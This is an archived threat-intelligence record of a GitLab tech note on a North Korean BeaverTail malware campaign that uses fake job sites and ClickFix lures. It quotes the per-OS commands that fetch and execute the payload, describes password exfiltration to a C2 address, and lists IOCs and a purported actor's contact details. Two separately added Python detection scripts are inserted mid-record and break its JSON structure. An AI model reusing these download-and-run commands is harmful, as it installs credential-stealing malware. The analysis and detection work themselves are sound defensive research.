{
	"id": "ce706824-8fb8-4670-aa1c-526696f1e32d",
	"created_at": "2026-04-06T00:10:18.393861Z",
	"updated_at": "2026-04-10T13:12:36.303009Z",
	"deleted_at": null,
	"sha1_hash": "77e88d2213778c698f6612940a73631da452f367",
	"title": "Tech Note - BeaverTail variant distributed via malicious repositories and ClickFix lure",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1240883,
	"plain_text": "Tech Note - BeaverTail variant distributed via malicious\r\nrepositories and ClickFix lure\r\nArchived: 2026-04-02 11:08:21 UTC\r\n17 September 2025 - Oliver Smith, GitLab Threat Intelligence\r\nKey Points\r\nWe’ve identified infrastructure used to distribute BeaverTail and InvisibleFerret malware variants since at\r\nleast May 2025. BeaverTail and InvisibleFerret are malware families operated by North Korean nation-state threat actors tracked under identifiers including Contagious Interview and Famous Chollima.\r\nWe’re publicizing this campaign because it contains slight shifts in threat actor tradecraft that may provide\r\ninsight into the direction of future operations:\r\nThe threat actor used ClickFix lures to target marketing and trader roles in cryptocurrency and retail\r\nsector organizations rather than targeting software development roles.\r\nThe threat actor’s malware was compiled into executables rather than typical distribution as scripts\r\nreliant on interpreters already present on target systems.\r\nWe assess that this activity was likely being tested by the threat actor and related malware is unlikely to\r\nhave been distributed at scale to date.\r\nBackground\r\nBeaverTail is JavaScript malware named by Palo Alto Unit 42 in 2023. BeaverTail is commonly hidden inside\r\nmalicious code repositories distributed to software developers under the false pretext of a job interview or work\r\nopportunity. BeaverTail has also been distributed as part of software supply chain attacks via the NPM package\r\nregistry and in campaigns trojanizing legitimate applications. 
BeaverTail infections steal sensitive cryptocurrency\r\nwallet data and browser and system credentials then load a second stage Python information stealer and remote\r\naccess tool tracked as InvisibleFerret.\r\nClickFix is a social engineering technique by which a threat actor attempts to induce a target to run a malicious\r\ncommand by presenting the user with a fake CAPTCHA or troubleshooting advice for a fake error. North Korean\r\nnation-state threat actor ClickFix attacks have been publicly documented since at least early 2025, however\r\ntypically relate to the distribution of a Golang malware variant tracked as GolangGhost and FlexibleFerret rather\r\nthan BeaverTail.\r\nBeaverTail + ClickFix\r\nIn late May 2025, a North Korean nation-state threat actor created infrastructure that used a ClickFix pretext to\r\ninduce job seekers to execute a compiled version of BeaverTail. The threat actor created a fake hiring platform\r\nweb application hosted at businesshire[.]top using the Vercel project hireproflix-iauhsmsuv-gabriels-projects-75362d20.vercel.app . The threat actor’s web application contained social engineering pretexts inviting\r\nhttps://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/\r\nPage 1 of 9\n\njob applications and investment inquiries. The threat actor’s web application included elements to apply for the\r\nfollowing:\r\nCryptocurrency trader roles at four web3 organizations\r\nSales or marketing roles at three web3 organizations and one US-based ecommerce retailer\r\nInvitations to invest at a web3 organization\r\nThe threat actor’s targeting of marketing applicants and impersonation of a retail sector organization is noteworthy\r\ngiven BeaverTail distributors’ usual focus on software developers and the cryptocurrency sector.\r\nThe threat actor’s backend service is hosted at nvidiasdk.fly[.]dev , and remains active as of the time of\r\npublication. 
We have not previously observed North Korean nation-state abuse of the Fly.io service. When a new\r\nvisitor accessed businesshire[.]top , the web application pinged the threat actor’s backend to obtain the\r\nvisitor’s IP address and made a request to api.ipify.org to obtain the user’s geolocation. The threat actor’s web\r\napplication also attempted to access cryptocurrency wallet-related objects in the browser’s window scope and\r\nrelayed any detected wallets to the threat actor on initial check in.\r\n[\"ethereum\", \"tronLink\", \"trustwallet\", \"coinbaseWalletExtension\", \"exodus\", \"BinanceChain\", \"okexchain\", \"enkr\r\nCryptocurrency-related elements targeted for discovery in threat actor's web application.\r\nApplication pages induce visitors to enter personal details and respond to text-based questions before concluding\r\nwith a prompt to record a short video response to a question. When attempting to record a video response, visitors\r\nare presented with a fake technical error related to their camera or microphone and troubleshooting instructions.\r\nTroubleshooting instructions are dynamic based on a visitor’s operating system as detected from their user agent\r\nstring. 
Both the job lure content and the fake troubleshooting instructions overlap with fake job interviews\r\nattributed to Famous Chollima by Cisco Talos in June.\r\nTroubleshooting instructions contain an operating system-specific command to execute a subsequent stage via the\r\nsystem command line.\r\ncurl -k -A 204 -o /var/tmp/nvidia.pkg https://nvidiasdk.fly[.]dev/nvs \u0026\u0026 sudo installer -pkg /var/tmp/nvidia.pk\r\ncurl -k -A 203 -o \"%temp%\\nvidia.tar.gz\" https://nvidiasdk.fly[.]dev/nvs \u0026\u0026 tar -xf \"%temp%\\nvidia.tar.gz\" -C \"\r\nwget --no-check-certificate --user-agent=\"208\" -qO- https://nvidiasdk.fly[.]dev/nvs | bash\r\nmacOS, Windows, and Linux ClickFix commands.\r\nIn each instance the payload URL is the same, with dynamic behaviour based on different numeric user agent\r\nheaders included in the commands. If a request is made without a specific user agent, the threat actor’s service\r\nresponds with a decoy payload. For example, for a request made from a Windows device without the header, the\r\nthreat actor’s service responds with an archive containing a benign VisualBasic script file and a legitimate, signed\r\nNvidia Broadcast executable. Alternatively, if a request is made with the 203 header, the threat actor’s service\r\nresponds with the true second stage. We’ve observed this type of header-based execution guardrail becoming\r\nincreasingly common in BeaverTail and OtterCookie operations through 2025. These guardrails delay automated\r\nidentification and linking of the threat actor’s infrastructure and reduce their footprint in security sandboxes.\r\nFor each operating system, the command is intended to execute BeaverTail. For macOS and Windows hosts,\r\nBeaverTail is downloaded in a compiled form rather than typical JavaScript form. 
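The three commands above fetch one URL and differ only in a numeric User-Agent, which is the value the backend keys on to hand out the real payload instead of the decoy. That makes the User-Agent itself the most useful thing to look for in shell history or process-creation telemetry. The Python below is an added example, not code from the tech note or from GitLab: it parses command lines of this shape, pulls out the downloader, the User-Agent and the URL, and scores the line on the combination of a numeric-only User-Agent, disabled TLS verification, staging in a temp directory and an execution sink (pipe to a shell, sudo installer, archive extraction). The sample lines are constructed from the three commands quoted above with shell quoting and the Windows path separator simplified and the URL kept defanged; the weights and thresholds are assumptions for this example, not a published detection rule.

```python
import re

# Constructed sample lines, not telemetry from a real host. The first three
# are the macOS, Windows and Linux ClickFix commands quoted in the tech note,
# with shell quoting and the Windows path separator simplified and the URL
# kept defanged; the last two are ordinary-looking lines for contrast.
SAMPLES = [
    'curl -k -A 204 -o /var/tmp/nvidia.pkg https://nvidiasdk.fly[.]dev/nvs && sudo installer -pkg /var/tmp/nvidia.pkg',
    'curl -k -A 203 -o %temp%/nvidia.tar.gz https://nvidiasdk.fly[.]dev/nvs && tar -xf %temp%/nvidia.tar.gz',
    'wget --no-check-certificate --user-agent=208 -qO- https://nvidiasdk.fly[.]dev/nvs | bash',
    'curl -fsSL https://example.invalid/install.sh | bash',
    'curl -A Mozilla/5.0 -o report.pdf https://example.invalid/report.pdf',
]

# Matches -A <ua>, -A=<ua>, --user-agent <ua> and --user-agent=<ua>; the
# value runs to the next space. Patterns avoid backslashes on purpose.
UA_FLAG = re.compile(r'(?:-A|--user-agent)[ =]+([^ ]+)')
URL = re.compile(r'https?://[^ |&]+')
INSECURE_FLAGS = ('-k', '--insecure', '--no-check-certificate')
# Execution sinks seen in the three chains, plus the generic pipe-to-shell.
SINKS = (
    ('| bash', 'pipe to bash'),
    ('| sh', 'pipe to sh'),
    ('sudo installer -pkg', 'macOS pkg install with sudo'),
    ('tar -xf', 'archive extraction'),
)
# Weights and thresholds are assumptions for this example, not a published rule.
WEIGHTS = {'numeric_ua': 3, 'insecure_tls': 1, 'sink': 2, 'temp_staging': 1}


def classify_clickfix(cmd):
    tokens = cmd.split()
    tool = next((t for t in tokens if t in ('curl', 'wget')), None)
    match = UA_FLAG.search(cmd)
    ua = match.group(1) if match else None
    signals = []
    score = 0
    # Browsers and package managers never send a bare number as a User-Agent;
    # here the number is the selector between decoy and real payload.
    if ua is not None and ua.isdigit():
        signals.append('numeric-only user agent ' + ua)
        score += WEIGHTS['numeric_ua']
    if any(t in INSECURE_FLAGS for t in tokens):
        signals.append('TLS verification disabled')
        score += WEIGHTS['insecure_tls']
    for needle, label in SINKS:
        if needle in cmd:
            signals.append(label)
            score += WEIGHTS['sink']
    if '%temp%' in cmd.lower() or '/var/tmp/' in cmd:
        signals.append('payload staged in a temp directory')
        score += WEIGHTS['temp_staging']
    if score >= 5:
        verdict = 'high'
    elif score >= 2:
        verdict = 'review'
    else:
        verdict = 'low'
    return {
        'tool': tool,
        'user_agent': ua,
        'urls': URL.findall(cmd),
        'signals': signals,
        'score': score,
        'verdict': verdict,
    }


def scan(lines):
    # One result per input line, in order, so callers can join back to source.
    return [classify_clickfix(line) for line in lines]


if __name__ == '__main__':
    for result in scan(SAMPLES):
        print(result['verdict'], result['score'], result['tool'], result['user_agent'], result['urls'])
```

Run the file directly to print a verdict per sample. The plain curl-pipe-to-bash line is deliberately scored as review rather than high, because legitimate installers use that pattern; what separates the ClickFix lines is the numeric User-Agent combined with disabled certificate checking and a temp-directory staging path. The same classifier can be pointed at EDR command-line fields, where the value the victim pasted survives verbatim.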
For macOS, the infection chain\r\nalso optionally includes a compiled version of InvisibleFerret. The binaries are produced using bundling tools like\r\npkg and PyInstaller rather than QT-compiled BeaverTail variants previously identified by Palo Alto. The binaries\r\nhave notably low static detection rates on VirusTotal (as low as zero at the time of publication), but exhibit\r\nwell-signatured network and file system behaviour upon execution.\r\nAn overview of the infection chains is below. File hashes for each of the components are available in the\r\nAppendix, and we’ve uploaded copies of referenced files to VirusTotal, Malshare, and Abuse.ch (size limits\r\npermitting) to enable third-party analysis.\r\nmacOS Delivery Chain\r\nThe macOS ClickFix command downloads an installer package from the threat actor’s backend and attempts to\r\ninstall it with sudo . The installer is for a package named com.nvidiahpc.pkg which contains no payload data\r\nand only serves to execute a preinstall script named preinstall .\r\nThe preinstall script attempts to read a user’s password from the variable MY_PASWOR in the file ~/.myvars\r\nand exfiltrate it to a remote IP address, hxxp[:]//172.86.93[.]139:3000/pawr/ . This file location and variable\r\nname are nonstandard and we assess these are likely testing artifacts that remain in the malware.\r\nThe preinstall script downloads and attempts to execute a bash script named downx64.sh contained in the\r\nbai branch of the GitHub repository /RominaMabelRamirez/dify . Commit history indicates that these files\r\nwere uploaded to GitHub in late April 2025 in a commit made by the Git identity Yash-1511\r\n\u003cyash1511@gmail.com\u003e . 
The downx64.sh script downloads two additional unsigned Mach-O binaries from the\r\nsame branch and repository, x64nvidia and payuniversal2 .\r\nThe downx64.sh script executes x64nvidia immediately. x64nvidia contains a stripped-down BeaverTail\r\nvariant, analyzed below. The payuniversal2 binary is a PyInstaller-compiled version of InvisibleFerret that\r\nprovides redundancy on systems without Python installed or where BeaverTail execution is interrupted. The\r\ndownx64.sh script executes the payuniversal2 binary only if either of the following cases is true:\r\nThe output of [ ! -x /usr/bin/python3 ] evaluates to true, meaning that Python 3 is not present and\r\nexecutable at a common global install location.\r\nIf after 10 seconds, the file ~/.npc does not exist. This file is the InvisibleFerret entry point Python script,\r\ndropped by BeaverTail.\r\nThe increased bundling of dependencies and redundancy to execute on a broader range of systems is consistent\r\nwith the targeting of non-software developer roles. Non-developers are less likely to have JavaScript and Python\r\ninterpreters present on their systems, meaning the threat actor needs to bundle dependencies to ensure execution.\r\nWindows Delivery Chain\r\nThe Windows ClickFix command downloads an archive named nvidia.tar.gz containing the following files:\r\nnvidiasdk.tar.gz\r\n├── .vscode\r\n│ └── argv.exe\r\n├── nvidiasdk.exe\r\n├── p8.zi\r\n└── update.vbs\r\nThe update.vbs script is a VisualBasic script that performs two actions:\r\nInvokes the hidden ./vscode/argv.exe executable, a renamed copy of 7zip, to extract the p8.zi archive\r\nusing the password ppp . The archive contains benign Python dependencies intended to be used by the\r\nsubsequent InvisibleFerret stage. 
These files are extracted to a hidden .pyp directory in the user’s home\r\ndirectory.\r\nExecutes the nvidiasdk.exe executable, which contains BeaverTail.\r\nLinux Delivery Chain\r\nThe Linux ClickFix command uses wget to download a script file, which is piped directly into bash . This\r\nscript installs node via the nvm-sh installer script, downloads a subsequent script from\r\nhxxps[:]//nvidiasdk.fly[.]dev/nvs using the user agent 209 and writes it to the file ~/.linvidia . Finally,\r\nthe script executes the payload with the command node ~/.linvidia 2\u003e\u00261 \u0026 .\r\nThe ~/.linvidia file contains a JavaScript version of BeaverTail, functionally identical to the versions that\r\nappear compiled into executables in the macOS and Windows infection chains.\r\nBeaverTail Variant\r\nThe BeaverTail variant associated with this campaign contains a simplified information stealer routine and targets\r\nfewer browser extensions. The variant targets only eight browser extensions rather than the 22 targeted in other\r\ncontemporary BeaverTail variants we’ve observed, dropping less widely installed cryptocurrency wallets. The\r\nvariant also omits dedicated functions targeting data for browsers other than Chrome, reducing overall size by\r\naround one third. The variant includes only minor string obfuscation using base64 slices rather than obfuscation\r\nvia javascript-obfuscator that we have commonly observed in BeaverTail code projects we identify and disrupt on\r\nGitLab.com.\r\nThe Windows version contains a small substitution intended to load python dependencies from the password-protected archive shipped alongside the malware using a 7z binary at .vscode/argv.json . This routine is a\r\nredundant copy of a step also present in the update.vbs script discussed above. 
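The three chains leave a small, fixed set of host artifacts: the installer package under /var/tmp plus ~/.myvars and ~/.npc on macOS, the hidden .pyp directory and the %temp% archive on Windows, and ~/.linvidia on Linux. Those paths give a host-side check that complements command-line detection. The Python below is an added example and not part of the tech note: it looks for those paths under a given home and temp directory and hashes any regular file it finds against the SHA256 values listed in the appendix. The directory layout in demo() is constructed from stand-in files, so in the demo no hash matches; a path hit without a hash match is a weak signal that needs review, a hash match is conclusive.

```python
import hashlib
import os
import tempfile

# Dropped-file locations described in the tech note, keyed by the delivery
# chain that creates them. Home-relative entries live under the user profile;
# temp entries live under /var/tmp (macOS) or %temp% (Windows).
HOME_ARTIFACTS = (
    ('.myvars', 'macOS', 'file the preinstall script reads the MY_PASWOR value from'),
    ('.npc', 'macOS', 'InvisibleFerret entry point dropped by BeaverTail'),
    ('.pyp', 'Windows', 'hidden directory of Python dependencies extracted from p8.zi'),
    ('.linvidia', 'Linux', 'JavaScript BeaverTail executed with node'),
)
TEMP_ARTIFACTS = (
    ('nvidia.pkg', 'macOS', 'installer package fetched by the ClickFix command'),
    ('nvidia.tar.gz', 'Windows', 'delivery archive fetched by the ClickFix command'),
)
# SHA256 values copied from the appendix of the tech note.
KNOWN_SHA256 = {
    '05ae07783d30b37aa5f0ffff86adde57d0d497fe915537a3fc010230b54e1ee8': 'nvidia.pkg',
    '17891f7db5a633c0186f3c2c8311a16a989b55bb0ba0430da7d2afb7f616c79c': 'nvidia.tar.gz',
    '4a1588e27a3f322e94e490173fe2bfa8d6e2f407b81a77af8787619b0d3d10bd': 'linvidia BeaverTail JavaScript',
    'e79b827b3cc29e940736dc20cc9c25958c0b09c25fc0bc8aacbd6365f38db71f': 'nvidiasdk.exe BeaverTail PE',
    '25c9fc5c5564a74430b92cb658d43e441dee1b3c0f692dc2571ac2918efa9a52': 'x64nvidia BeaverTail Mach-O',
    'eba9fdb2f077f9a3e14cf428162b967b5e6c189db19c33c5b11601efcd02b3d3': 'payuniversal2 InvisibleFerret Mach-O',
}


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, 'rb') as handle:
        for chunk in iter(lambda: handle.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()


def triage(home, tmp):
    # Returns one finding per artifact that exists, in table order. A finding
    # with known_sample set is a hash match; one without is a path-only hit.
    findings = []
    for base, table in ((home, HOME_ARTIFACTS), (tmp, TEMP_ARTIFACTS)):
        for rel, chain, what in table:
            path = os.path.join(base, rel)
            if not os.path.lexists(path):
                continue
            digest = sha256_of(path) if os.path.isfile(path) else None
            findings.append({
                'path': path,
                'chain': chain,
                'what': what,
                'sha256': digest,
                'known_sample': KNOWN_SHA256.get(digest),
            })
    return findings


def demo():
    # CONSTRUCTED stand-ins: a throwaway home and temp directory holding a
    # placeholder .npc file, an empty .pyp directory and a fake nvidia.tar.gz.
    # None of these are the real samples, so no hash will match.
    with tempfile.TemporaryDirectory() as home, tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(home, '.npc'), 'w') as handle:
            handle.write('stand-in, not the InvisibleFerret script')
        os.mkdir(os.path.join(home, '.pyp'))
        with open(os.path.join(tmp, 'nvidia.tar.gz'), 'wb') as handle:
            handle.write(b'stand-in archive bytes')
        return triage(home, tmp)


if __name__ == '__main__':
    for finding in demo():
        print(finding['chain'], finding['path'], finding['sha256'], finding['known_sample'])
```

On a live host call triage(os.path.expanduser('~'), '/var/tmp') on macOS or Linux and triage(os.path.expanduser('~'), os.environ['TEMP']) on Windows. The Windows extraction directory is not included because the tech note truncates the tar -C argument, and the macOS pkg leaves a receipt that pkgutil --pkgs can also be queried for com.nvidiahpc.pkg.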
We’ve observed an identical\r\nBeaverTail sample in a malicious code repository that also contained a hidden 7zip executable. The entry point for\r\nthe malicious repo is a require statement which reads an encoded filepath from .env to execute a BeaverTail\r\nJavaScript file at ./vscode/desktop.ini . The BeaverTail script downloads InvisibleFerret dependencies in a\r\npassword-protected archive using the same password, ppp . Password-protected archives are a common method\r\nof payload delivery among threat actors generally, but not a technique we typically observe in BeaverTail delivery.\r\nThe BeaverTail and InvisibleFerret samples associated with this campaign both use 172.86.93.139 as a\r\ncommand and control address and use tttttt as the campaign identifier.\r\nThe threat actor’s web application contained a list of hard-coded IP addresses for which the fake technical error\r\nfunctionality would not activate. We also identified an earlier draft of the web application that contained only the\r\nfirst two IP addresses.\r\n188.43.33.250\r\n49.145.111.7\r\n190.120.252.13\r\n118.148.107.73\r\n87.249.132.144\r\n94.224.115.64\r\n198.50.130.118\r\n94.71.186.249\r\n77.166.75.76\r\n134.228.221.237\r\n81.184.178.102\r\n81.34.167.92\r\n50.67.15.10\r\n128.203.96.252\r\nWe observed the threat actor originating from the first IP address, 188.43.33.250 , when active on GitLab.com.\r\n188.43.33.250 is a Russian TransTelecom IP address publicly associated with North Korean nation-state\r\nactivity. Based on the inclusion of this IP address in the allowlist, we assess that the allowlist’s purpose almost\r\ncertainly includes protecting operators from the risk of accidental infection. 
We recommend that organizations,\r\nparticularly operators of services abused by North Korean threat actors, hunt for anomalous activity originating\r\nfrom these IP addresses. We note that this list includes VPN and likely residential proxy infrastructure that is not\r\nexclusively controlled by the threat actor and may include security scanner infrastructure that the threat actor is\r\nattempting to frustrate.\r\nVercel variables indicate that the threat actor’s web application was built from the GitHub repository\r\nRominaMabelRamirez/hflix from a commit made by dmytroviv1 . The dmytroviv1 handle has a GitHub pages\r\npersonal site ( https://dmytroviv1.github.io/ ) containing education and professional history lifted verbatim\r\nand translated from another GitHub user’s Indonesian-language site. The threat actor’s personal site lists the\r\nfollowing contact information:\r\nName: Dmytro Vivsuk\r\nEmail: dmytroviv1[@]gmail.com\r\nPhone number: +380 95 676 27 42\r\nLinkedIn: https://www.linkedin.com/in/dmytro-vivsuk-a568242b6/ (leads to a 404, likely banned\r\nprofile)\r\nAssessment\r\nBased on our observations, the threat actor started developing this campaign in early 2025 and started testing\r\ndeployments from May 2025 onwards. We assess that this campaign is unlikely to have been deployed at scale to\r\ndate based on the low prevalence of secondary payloads in public malware sandboxes and low static detection\r\nrates, development artifacts present in malware, and a low level of polish present in social engineering content.\r\nThe campaign suggests a slight tactical shift for a subgroup of North Korean BeaverTail operators, expanding\r\nbeyond their traditional software developer targeting to pursue marketing and trading roles across cryptocurrency\r\nand retail sectors. 
The move to compiled malware variants and continued reliance on ClickFix techniques\r\ndemonstrates operational adaptation to reach less technical targets and systems without standard software\r\ndevelopment tools installed. We assess that the threat actor is likely to continue to seek opportunities to expand\r\ntheir potential targets as public awareness of their techniques increases and the available pool of susceptible and\r\ndiscoverable targets becomes saturated.\r\nAppendix - Indicators of Compromise\r\nMalware\r\nIOC  Type  Description\r\n05ae07783d30b37aa5f0ffff86adde57d0d497fe915537a3fc010230b54e1ee8  SHA256  nvidia.pkg, malicious macOS installer package\r\n247fdba5fbfd076d9c530d937406aa097d6794b9af26bfc64bf6ea765ed51a50  SHA256  preinstall script contained in nvidia.pkg\r\n65665c3faba4fbfed12488e945306b10131afb9d3ad928accdcef75e0945a086  SHA256  downx64.sh, macOS installer script\r\n25c9fc5c5564a74430b92cb658d43e441dee1b3c0f692dc2571ac2918efa9a52  SHA256  x64nvidia, BeaverTail Mach-O file\r\neba9fdb2f077f9a3e14cf428162b967b5e6c189db19c33c5b11601efcd02b3d3  SHA256  payuniversal2, InvisibleFerret Mach-O file\r\n17891f7db5a633c0186f3c2c8311a16a989b55bb0ba0430da7d2afb7f616c79c  SHA256  nvidia.tar.gz, Windows delivery archive\r\n6a16b1ef16e999a0d32a4b9189f6f179d629ba143b5b03db06c95156ee089615  SHA256  update.vbs, Windows launcher script\r\ne79b827b3cc29e940736dc20cc9c25958c0b09c25fc0bc8aacbd6365f38db71f  SHA256  nvidiasdk.exe, BeaverTail PE file\r\n9bc46c59e734b2389328a5103739f42bed7d820c73f75c49cc5a2e8cacfe8940  SHA256  First unnamed piped bash script in Linux infection chain\r\ne224a1db42ae2164d6b2f2a7f1f0e02056e099fc8d669ce37cdaa0a2a2750e3b  SHA256  Second unnamed piped bash script in Linux infection chain\r\n4a1588e27a3f322e94e490173fe2bfa8d6e2f407b81a77af8787619b0d3d10bd  SHA256  linvidia, BeaverTail JavaScript file\r\nInfrastructure\r\nIOC  Type  Description\r\nbusinesshire[.]top  Domain  Domain used to host fake recruiting site containing ClickFix commands\r\nnvidiasdk.fly[.]dev  Domain  Backend service and malware staging for businesshire[.]top\r\n172.86.93[.]139  IP  Command and control address for BeaverTail and InvisibleFerret\r\n188.43.33[.]250  IP  Threat actor originating IP address\r\nPersonas\r\nIOC  Type  Description\r\nRominaMabelRamirez  GitHub handle  Owner of the Vercel project used to publish fake recruiting site and GitHub repo containing malware, RominaMabelRamirez/dify\r\nYash-1511  Git identity  Committed malware to RominaMabelRamirez/dify\r\nyash1511@gmail.com  Email address  Email address associated with Git identity Yash-1511\r\ndmytroviv1  GitHub handle  Committed to fake recruiting site built from RominaMabelRamirez/hflix\r\nDmytro Vivsuk  Name  Stated name of dmytroviv1\r\ndmytroviv1@gmail.com  Email address  Stated email address of dmytroviv1\r\n+380 95 676 27 42  Phone number  Stated phone number of dmytroviv1\r\nGitLab Threat Intelligence Estimative Language\r\nGitLab Threat Intelligence uses specific language to convey the estimated probability attached to our assessments.\r\nWe also use words including \"possible\" and \"may\" in circumstances where we are unable to provide a specific\r\nestimate. Further reading on estimative language is available here.\r\nEstimative Term  Probability Range\r\nHighly unlikely  0%-20%\r\nUnlikely  20%-40%\r\nReal chance  40%-60%\r\nLikely  60%-80%\r\nHighly likely  80%-100%\r\nSource: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/"
	],
	"report_names": [
		"north-korean-malware-sept-2025"
	],
	"threat_actors": [
		{
			"id": "7187a642-699d-44b2-9c69-498c80bce81f",
			"created_at": "2025-08-07T02:03:25.105688Z",
			"updated_at": "2026-04-10T02:00:03.78394Z",
			"deleted_at": null,
			"main_name": "NICKEL TAPESTRY",
			"aliases": [
				"CL-STA-0237 ",
				"CL-STA-0241 ",
				"DPRK IT Workers",
				"Famous Chollima ",
				"Jasper Sleet Microsoft",
				"Purpledelta Recorded Future",
				"Storm-0287 ",
				"UNC5267 ",
				"Wagemole "
			],
			"source_name": "Secureworks:NICKEL TAPESTRY",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d05e8567-9517-4bd8-a952-5e8d66f68923",
			"created_at": "2024-11-13T13:15:31.114471Z",
			"updated_at": "2026-04-10T02:00:03.761535Z",
			"deleted_at": null,
			"main_name": "WageMole",
			"aliases": [
				"Void Dokkaebi",
				"WaterPlum",
				"PurpleBravo",
				"Famous Chollima",
				"UNC5267",
				"Wagemole",
				"Nickel Tapestry",
				"Storm-1877"
			],
			"source_name": "MISPGALAXY:WageMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434218,
	"ts_updated_at": 1775826756,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/77e88d2213778c698f6612940a73631da452f367.pdf",
		"text": "https://archive.orkl.eu/77e88d2213778c698f6612940a73631da452f367.txt",
		"img": "https://archive.orkl.eu/77e88d2213778c698f6612940a73631da452f367.jpg"
	}
}